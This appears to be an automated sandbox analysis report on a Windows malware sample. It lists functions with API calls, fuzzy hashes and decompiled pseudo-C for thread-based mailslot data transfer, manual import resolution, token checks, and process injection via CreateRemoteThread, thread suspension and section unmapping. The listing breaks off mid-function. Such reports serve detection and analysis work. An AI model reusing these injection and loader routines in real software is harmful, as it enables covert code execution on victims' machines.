Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
